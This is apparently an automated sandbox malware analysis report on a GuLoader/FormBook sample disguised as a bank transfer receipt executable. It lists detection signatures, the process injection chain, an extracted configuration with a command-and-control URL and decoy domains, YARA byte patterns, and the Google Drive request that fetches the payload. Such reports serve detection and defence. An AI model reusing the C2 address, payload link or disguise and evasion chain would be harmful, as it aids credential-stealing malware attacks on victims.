Play interactive tour

Edit tour

Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Sample Name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Analysis ID:	540355
MD5:	72a345c95142aee60e7df54b570c2c6b
SHA1:	aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256:	a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
Tags:	exeFormbookguloaderxloader
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Detected unpacking (changes PE section rights)

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Sigma detected: Suspect Svchost Activity

Yara detected GuLoader

Hides threads from debuggers

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Sigma detected: Suspicious Svchost Process

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Bank_Transfer_Receipt_Copy_Scan#342 (5).exe (PID: 4360 cmdline: "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe" MD5: 72A345C95142AEE60E7DF54B570C2C6B)

nongrav.exe (PID: 6136 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)

nongrav.exe (PID: 4520 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe MD5: BEB33BD2BF3282F8C86081144236545D)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)

cmd.exe (PID: 5168 cmdline: /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

rundll32.exe (PID: 1096 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000016.00000002.821885746.0000000003F37000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x2f00:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: nongrav.exe PID: 4520	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: svchost.exe PID: 6932	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 21 entries

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity

Show sources

Source: Process started

Author: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6932

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Metadefender: Detection: 14%			Perma Link
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	ReversingLabs: Detection: 26%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Show sources

Source: www.thesocialmediacreator.com/i638/

Virustotal: Detection: 5%

Perma Link

Machine Learning detection for sample

Show sources

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Joe Sandbox ML: detected

Source: 1.2.nongrav.exe.560000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3f3796c.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 22.2.svchost.exe.3214020.1.unpack	Avira: Label: TR/Dropper.Gen

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00F32DAE

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00F321E7

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 4x nop then pop esi

22_2_02D35825

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.thesocialmediacreator.com/i638/

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837

Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp

String found in binary or memory: https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-ao-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49838 version: TLS 1.2

Source: nongrav.exe, 00000001.00000002.507440632.00000000006BA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
